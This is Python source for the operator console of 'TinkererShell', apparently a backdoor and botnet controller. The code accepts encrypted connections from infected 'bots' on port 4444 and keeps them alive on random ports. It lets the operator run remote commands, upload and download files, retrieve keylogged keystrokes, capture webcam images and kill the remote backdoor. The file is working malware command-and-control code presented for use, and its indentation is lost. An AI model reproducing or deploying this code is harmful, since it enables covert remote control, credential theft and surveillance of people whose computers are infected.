def handler(new_so, new_port, username):
"""Keep-alive the connected bots.\n"""
global connected_sockets
new_so.listen(10)
conn_handler, addr = new_so.accept()
lengthcrypt = conn_handler.recv(1024)
expected_length = int(decode_aes(lengthcrypt))
encrypted_received_data: str = ''
while len(encrypted_received_data) < expected_length:
encrypted_received_data += conn_handler.recv(1024).decode('utf-8')
a = decode_aes(encrypted_received_data)
if a == username:
logging(data_to_log=('Connection consolidated with: {}\t{}'.format(str(addr).split('\'')[1], username)),
printer=True)
connected_sockets.append(
{'conn': conn_handler, 'port': new_port, 'ip': str(addr).split('\'')[1], 'username': username,
'status': True})
position = len(connected_sockets) - 1
while True:
if position != active_bot:
encrypted = encode_aes('KeepAlive')
# Send encrypted data's length encrypted
conn_handler.send(bytes(encode_aes(str(len(encrypted))), 'utf-8'))
# Sleep 1 second to let the receiver decrypt the length packet.
sleep(1)
# Send encrypted data
conn_handler.send(bytes(encrypted, 'utf-8'))
sleep(60)
if thr_exit.isSet():
break
conn_handler.close()
def default(self, command):
if command != 'SHquit' and command != 'SHkill':
sender(command)
response = receiver()
if response == 'reachedexcept':
receiver(printer=True)
else:
logging(data_to_log=response, printer=True)
def receiver(printer=False) -> str:
"""Receive encrypted data and return clear-text string.\n"""
lengthcrypt = conn.recv(1024).decode('utf-8')
expected_length = int(decode_aes(lengthcrypt))
encrypted_received_data: str = ''
while len(encrypted_received_data) < expected_length:
encrypted_received_data += conn.recv(1024).decode('utf-8')
clear_text = decode_aes(encrypted_received_data)
if printer is True:
logging(data_to_log=clear_text, printer=True)
return clear_text
def ask_input(phrase: object = False, send: bool = False) -> str:
"""Ask for user input with custom phrase or default to >>>. If needed send input to connected bot.\n"""
if phrase:
user_input = input(phrase)
logging(data_to_log=(''.join((phrase, user_input))))
if send is True:
sender(user_input)
else:
user_input = input('>>> ')
logging(data_to_log=('>>> ' + user_input))
if send is True:
sender(user_input)
return user_input
def do_SHbots(self, option):
"""SHbots [option]\n\tlist: List connected bots\n\t[bot number]: Interact with target bot\n"""
global active_bot
global conn
if option:
if option == 'list':
active_bots_str = '\nActive bots:'
inactive_bots_str = '\n\nInactive bots:'
for bots_counter, bot in enumerate(connected_sockets):
if bot['status'] is True:
active_bots_str += '\n\tBot # {}\t\t{}\t{}'.format(bots_counter, bot['ip'], bot['username'])
else:
inactive_bots_str += '\n\tBot # {}\t\t{}\t{}'.format(bots_counter, bot['ip'], bot['username'])
printable_bots = active_bots_str + inactive_bots_str + '\n\n\nYou can interact with a bot using "SHbots [bot-number]"\n'
logging(data_to_log=printable_bots, printer=True)
elif option.isdigit() is True:
try:
if connected_sockets[int(option)]['status'] is True:
double_check = ask_input(phrase='Are you sure? yes/no\n')
if double_check == 'yes':
active_bot = int(option)
conn = connected_sockets[int(option)]['conn']
tinkerer_menu()
else:
logging(data_to_log='Selection canceled\n', printer=True)
except Exception as exception_default:
if str(exception_default) == 'list index out of range':
logging(data_to_log='The selected bot does not exist\n', printer=True)
else:
logging(data_to_log=str(exception_default), printer=True)
else:
print('Aborted: unknown option\n')
else:
print('Aborted: an option is required\n')
def kill_current_bot() -> bool:
# noinspection PyPep8
"""Terminate remote backdoor thread.\n"""
global connected_sockets
double_check = ask_input(phrase='Are you sure? yes/no\n')
if double_check == 'yes':
sender('SHkill')
response = receiver()
if response != 'mistochiudendo':
logging(data_to_log=response, printer=True)
connected_sockets[active_bot]['status'] = False
return True
logging(data_to_log='Operation aborted\n', printer=True)
return False
def keylogdownloader():
"""Download keystrokes logged by keylogger.\n"""
sender('SHkeylogdownload')
keylogged_data = receiver()
local_filename = 'keylogged-{}-{}.txt'.format(connected_sockets[active_bot]['ip'],
connected_sockets[active_bot]['username'])
if keylogged_data == 'reachedexcept':
receiver(printer=True)
else:
try:
keylogged_descriptor = open(local_filename, 'a')
keylogged_descriptor.write(keylogged_data)
keylogged_descriptor.close()
logging(data_to_log='Download completed!\n Use <SHkeylog show> to see keylogged data\n', printer=True)
except Exception as exception_keylogdownloader:
logging(data_to_log=str(exception_keylogdownloader), printer=True)
def uploader() -> bool:
"""Upload a file to the bot.\n"""
sender('SHupload')
file_to_upload = ask_input(phrase=('Insert the name of the file that you want to upload\t\t' + os.path.normcase(
'C:/boot.ini') + '\n\n >>> '))
ask_input(phrase='Insert name which you want to use to save the file\t\tC:\\boot.ini\n\n >>> ', send=True)
try:
upload_descriptor = open(file_to_upload, 'rb')
file_data = upload_descriptor.read()
upload_descriptor.close()
except Exception as exception_uploader:
logging(data_to_log=str(exception_uploader), printer=True)
file_data = 'reachedexcept'
sender(file_data.decode('utf-8'))
receiver(printer=True)
return True
def keylogshower():
"""Show downloaded keystrokes in a tk window.\n"""
local_filename = 'keylogged-{}-{}.txt'.format(connected_sockets[active_bot]['ip'],
connected_sockets[active_bot]['username'])
try:
keylogged_descriptor = open(local_filename, 'r')
print(keylogged_descriptor.read())
keylogged_descriptor.close()
except IOError as exception_keylogshower:
if exception_keylogshower.errno == 2:
# noinspection PyPep8
logging(
data_to_log='It looks like you never downloaded keylogged data from bot!\n Going to download it now for you...\n',
printer=True)
keylogdownloader()
keylogshower()
else:
logging(data_to_log=str(exception_keylogshower), printer=True)
def webcam_pic() -> bool:
"""Take a full screen screenshot from the bot.\n"""
sender('SHwebcampic')
received_file_data = b64decode(receiver())
if received_file_data != 'reachedexcept':
counter = 0
while True:
local_filename = 'webcam-pic-{}-{}-{}.png'.format(connected_sockets[active_bot]['ip'],
connected_sockets[active_bot]['username'], str(counter))
if not os.path.isfile(local_filename):
break
counter += 1
try:
downloaded_file_descriptor = open(local_filename, 'wb')
downloaded_file_descriptor.write(received_file_data)
downloaded_file_descriptor.close()
logging(data_to_log=('Screenshot saved as ' + local_filename + '\n'), printer=True)
except Exception as exception_downloader:
logging(data_to_log=str(exception_downloader), printer=True)
else:
remote_exception = receiver()
logging(
data_to_log='Operation aborted (received <reachedexcept> string from bot)\nDetails: ' + remote_exception,
printer=True)
return True
def downloader() -> bool:
"""Download a file from the bot.\n"""
sender('SHdownload')
# File to be downloaded
receiver(printer=True)
ask_input(send=True)
received_file_data = receiver()
# Local filename to save downloaded file
local_filename = ask_input(
phrase=
'Insert name which you want to use to save the file\t\texample.txt\n\n >>> '
)
# sender(a)
if received_file_data != 'reachedexcept':
try:
downloaded_file_descriptor = open(local_filename, 'wb')
downloaded_file_descriptor.write(bytes(received_file_data,
'utf-8'))
downloaded_file_descriptor.close()
logging(data_to_log=('File saved in ' + os.getcwd() + '\n'),
printer=True)
except Exception as exception_downloader:
logging(data_to_log=str(exception_downloader), printer=True)
else:
remote_exception = receiver()
logging(
data_to_log=
'Operation aborted (received <reachedexcept> string from bot)\nDetails: '
+ remote_exception,
printer=True)
return True
def connection_gate():
"""Thread that keep accepting new bots, assigning ports, and passing them to other threads doing keep-alive.\n"""
host = ''
port = 4444
# Socket definition
s = socket(AF_INET, SOCK_STREAM)
s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
s.bind((host, port))
logging(data_to_log='\nWelcome in TinkererShell!\nWritten By 4n4nk3: https://github.com/4n4nk3\n', printer=True)
logging(data_to_log=('Listening on 0.0.0.0:%s...' % str(port)), printer=True)
# Listening...
s.listen(10)
while True:
while True:
so = s
so.settimeout(60)
try:
conn_gate, addr = so.accept()
break
except timeout:
if thr_exit.isSet():
break
pass
if thr_exit.isSet():
break
# noinspection PyUnboundLocalVariable
lengthcrypt = conn_gate.recv(1024).decode('utf-8')
expected_length = int(decode_aes(lengthcrypt))
encrypted_received_data: str = ''
while len(encrypted_received_data) < expected_length:
encrypted_received_data += conn_gate.recv(1024).decode('utf-8')
clear_text = decode_aes(encrypted_received_data)
logging(data_to_log=('Connection established with: ' + str(addr).split('\'')[1]), printer=True)
while True:
new_port = randrange(5000, 6000)
try:
new_so = socket(AF_INET, SOCK_STREAM)
new_so.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
new_so.bind((host, new_port))
encrypted = encode_aes(str(new_port))
# Send encrypted data's length encrypted
conn_gate.send(bytes(encode_aes(str(len(encrypted))), 'utf-8'))
# Sleep 1 second to let the receiver decrypt the length packet.
sleep(1)
# Send encrypted data
conn_gate.send(bytes(encrypted, 'utf-8'))
threading.Thread(target=handler, args=(new_so, new_port, clear_text)).start()
break
except os.error as exception_gate:
if exception_gate.errno == 98:
print("Port is already in use")
else:
print(exception_gate)
if thr_exit.isSet():
break
if thr_exit.isSet():
break
def quit_utility() -> bool:
# noinspection PyPep8
"""Ask if user wants to terminate backdoor threads in connected bots and kill them, then exits.\n"""
global conn
global thr_exit
double_check = ask_input(phrase='Are you sure? yes/no\n')
if double_check == 'yes':
kill_all = ask_input(
phrase='Do you want to kill all the bots? yes/no\n')
for bot in connected_sockets:
if bot['status'] is True:
conn = bot['conn']
if kill_all == 'yes':
sender('SHkill')
else:
sender('SHquit')
response = receiver()
if response != 'mistochiudendo':
logging(data_to_log=response, printer=True)
thr_exit.set()
return True
logging(data_to_log='Operation aborted\n', printer=True)
return False
def precmd(self, line):
logging(data_to_log=('\n(Cmd) ' + line))
return cmd.Cmd.precmd(self, line)
def do_SHreturn(self, option):
"""SHreturn\n\tReturn to TinkererShell bot selection mode.\n"""
logging(data_to_log='Returning to TinkererShell bot selection mode...\n', printer=True)
return True
def postloop(self):
logging(data_to_log='\nQuitting!', printer=True)
